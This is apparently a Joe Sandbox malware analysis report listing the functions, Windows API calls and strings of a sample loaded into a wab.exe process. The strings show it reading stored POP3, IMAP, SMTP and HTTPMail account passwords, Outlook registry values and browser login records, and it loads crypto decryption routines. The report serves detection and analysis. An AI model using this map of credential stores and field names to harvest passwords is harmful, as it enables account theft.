                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863332320-0
                                                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                • API String ID: 2238633743-192783356
                                                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00406E41
                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 00406E63
                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                • CloseClipboard.USER32 ref: 00406E94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                • String ID:
                                                                                                                • API String ID: 2565263379-0
                                                                                                                • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 004431AD
                                                                                                                • _strncoll.MSVCRT ref: 004431BD
                                                                                                                • memcpy.MSVCRT ref: 00443239
                                                                                                                • atoi.MSVCRT ref: 0044324A
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                • API String ID: 1864335961-3210201812
                                                                                                                • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040DD7B Relevance: 77.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi$strlen$_strncoll$atoimemcpy$memset
                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                • API String ID: 750245531-2206097438
                                                                                                                • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                • API String ID: 1714764973-479759155
                                                                                                                • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED59
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED6F
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED85
                                                                                                                • _mbscpy.MSVCRT ref: 0040ED9B
                                                                                                                • _mbscpy.MSVCRT ref: 0040EDB1
                                                                                                                • _mbscpy.MSVCRT ref: 0040EDC7
                                                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                • API String ID: 3137614212-1455797042
                                                                                                                • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                • _mbscpy.MSVCRT ref: 0040E634
                                                                                                                • _mbscpy.MSVCRT ref: 0040E64A
                                                                                                                • _mbscpy.MSVCRT ref: 0040E660
                                                                                                                • _mbscpy.MSVCRT ref: 0040E676
                                                                                                                • _mbscpy.MSVCRT ref: 0040E68C
                                                                                                                • _mbscpy.MSVCRT ref: 0040E69F
                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                • _mbscpy.MSVCRT ref: 00402533
                                                                                                                • _mbscpy.MSVCRT ref: 004025FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                • API String ID: 168965057-606283353
                                                                                                                • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402869
                                                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
